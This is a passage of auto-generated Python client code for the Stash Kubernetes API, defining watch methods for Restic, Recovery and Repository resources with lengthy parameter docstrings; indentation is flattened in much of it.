:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is the maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested number of items (possibly zero) when all requested objects are filtered out, so clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument, in which case they return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit; that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and it ensures that a client using limit to receive smaller chunks of a very large result can see all possible objects. If objects are updated during a chunked list, the version of each object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for a list: if unset, the result is returned from remote storage based on the quorum-read flag; if '0', the result is whatever is currently in cache, with no guarantee of freshness; if set to a non-zero value, the result is at least as fresh as the given resourceVersion.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.watch_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, **kwargs) # noqa: E501
else:
data = self.watch_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, **kwargs)  # noqa: E501
return data
def watch_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""watch_stash_appscode_com_v1alpha1_namespaced_restic # noqa: E501
watch changes to an object of kind Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, async=True)
>>> result = thread.get()
:param bool async: if True, perform the request asynchronously and return the request thread
:param str name: name of the Restic (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server-defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue), and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid, whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error indicating that the client must restart its list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is the maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested number of items (possibly zero) when all requested objects are filtered out, so clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument, in which case they return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit; that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and it ensures that a client using limit to receive smaller chunks of a very large result can see all possible objects. If objects are updated during a chunked list, the version of each object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for a list: if unset, the result is returned from remote storage based on the quorum-read flag; if '0', the result is whatever is currently in cache, with no guarantee of freshness; if set to a non-zero value, the result is at least as fresh as the given resourceVersion.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', '_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'pretty', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_stash_appscode_com_v1alpha1_namespaced_restic" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `watch_stash_appscode_com_v1alpha1_namespaced_restic`") # noqa: E501
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `watch_stash_appscode_com_v1alpha1_namespaced_restic`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if '_continue' in params:
query_params.append(('continue', params['_continue'])) # noqa: E501
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector'])) # noqa: E501
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized'])) # noqa: E501
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version'])) # noqa: E501
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds'])) # noqa: E501
if 'watch' in params:
query_params.append(('watch', params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/watch/namespaces/{namespace}/restics/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoK8sApimachineryPkgApisMetaV1WatchEvent', # noqa: E501
auth_settings=auth_settings,
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats,
# 'async' is a reserved word in Python >= 3.7; pass it via **-expansion
**{'async': params.get('async')})  # noqa: E501
def watch_stash_appscode_com_v1alpha1_namespaced_restic_list(self, namespace, **kwargs): # noqa: E501
"""watch_stash_appscode_com_v1alpha1_namespaced_restic_list # noqa: E501
watch individual changes to a list of Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_namespaced_restic_list(namespace, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.watch_stash_appscode_com_v1alpha1_namespaced_restic_list_with_http_info(namespace, **kwargs) # noqa: E501
else:
(data) = self.watch_stash_appscode_com_v1alpha1_namespaced_restic_list_with_http_info(namespace, **kwargs) # noqa: E501
return data

    def watch_stash_appscode_com_v1alpha1_namespaced_restic_list_with_http_info(self, namespace, **kwargs): # noqa: E501
        """watch_stash_appscode_com_v1alpha1_namespaced_restic_list # noqa: E501
watch individual changes to a list of Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_namespaced_restic_list_with_http_info(namespace, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', '_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'pretty', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_stash_appscode_com_v1alpha1_namespaced_restic_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `watch_stash_appscode_com_v1alpha1_namespaced_restic_list`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if '_continue' in params:
query_params.append(('continue', params['_continue'])) # noqa: E501
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector'])) # noqa: E501
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized'])) # noqa: E501
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version'])) # noqa: E501
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds'])) # noqa: E501
if 'watch' in params:
query_params.append(('watch', params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/watch/namespaces/{namespace}/restics', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoK8sApimachineryPkgApisMetaV1WatchEvent', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)

    def watch_stash_appscode_com_v1alpha1_recovery_list_for_all_namespaces(self, **kwargs): # noqa: E501
        """watch_stash_appscode_com_v1alpha1_recovery_list_for_all_namespaces # noqa: E501
watch individual changes to a list of Recovery # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_recovery_list_for_all_namespaces(async=True)
>>> result = thread.get()
:param async bool
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.watch_stash_appscode_com_v1alpha1_recovery_list_for_all_namespaces_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.watch_stash_appscode_com_v1alpha1_recovery_list_for_all_namespaces_with_http_info(**kwargs) # noqa: E501
return data

    def watch_stash_appscode_com_v1alpha1_recovery_list_for_all_namespaces_with_http_info(self, **kwargs): # noqa: E501
        """watch_stash_appscode_com_v1alpha1_recovery_list_for_all_namespaces # noqa: E501
watch individual changes to a list of Recovery # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_recovery_list_for_all_namespaces_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'pretty', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_stash_appscode_com_v1alpha1_recovery_list_for_all_namespaces" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if '_continue' in params:
query_params.append(('continue', params['_continue'])) # noqa: E501
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector'])) # noqa: E501
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized'])) # noqa: E501
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version'])) # noqa: E501
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds'])) # noqa: E501
if 'watch' in params:
query_params.append(('watch', params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/watch/recoveries', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoK8sApimachineryPkgApisMetaV1WatchEvent', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)

    def watch_stash_appscode_com_v1alpha1_repository_list_for_all_namespaces(self, **kwargs): # noqa: E501
        """watch_stash_appscode_com_v1alpha1_repository_list_for_all_namespaces # noqa: E501
watch individual changes to a list of Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_repository_list_for_all_namespaces(async=True)
>>> result = thread.get()
:param async bool
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.watch_stash_appscode_com_v1alpha1_repository_list_for_all_namespaces_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.watch_stash_appscode_com_v1alpha1_repository_list_for_all_namespaces_with_http_info(**kwargs) # noqa: E501
return data

    def watch_stash_appscode_com_v1alpha1_repository_list_for_all_namespaces_with_http_info(self, **kwargs): # noqa: E501
        """watch_stash_appscode_com_v1alpha1_repository_list_for_all_namespaces # noqa: E501
watch individual changes to a list of Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_repository_list_for_all_namespaces_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'pretty', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method watch_stash_appscode_com_v1alpha1_repository_list_for_all_namespaces" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []
        if '_continue' in params:
            query_params.append(('continue', params['_continue']))  # noqa: E501
        if 'field_selector' in params:
            query_params.append(('fieldSelector', params['field_selector']))  # noqa: E501
        if 'include_uninitialized' in params:
            query_params.append(('includeUninitialized', params['include_uninitialized']))  # noqa: E501
        if 'label_selector' in params:
            query_params.append(('labelSelector', params['label_selector']))  # noqa: E501
        if 'limit' in params:
            query_params.append(('limit', params['limit']))  # noqa: E501
        if 'pretty' in params:
            query_params.append(('pretty', params['pretty']))  # noqa: E501
        if 'resource_version' in params:
            query_params.append(('resourceVersion', params['resource_version']))  # noqa: E501
        if 'timeout_seconds' in params:
            query_params.append(('timeoutSeconds', params['timeout_seconds']))  # noqa: E501
        if 'watch' in params:
            query_params.append(('watch', params['watch']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['*/*'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/apis/stash.appscode.com/v1alpha1/watch/repositories', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='IoK8sApimachineryPkgApisMetaV1WatchEvent',  # noqa: E501
            auth_settings=auth_settings,
            async=params.get('async'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def watch_stash_appscode_com_v1alpha1_restic_list_for_all_namespaces(self, **kwargs):  # noqa: E501
        """watch_stash_appscode_com_v1alpha1_restic_list_for_all_namespaces  # noqa: E501

        watch individual changes to a list of Restic  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.watch_stash_appscode_com_v1alpha1_restic_list_for_all_namespaces(async=True)
        >>> result = thread.get()

        :param async bool
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
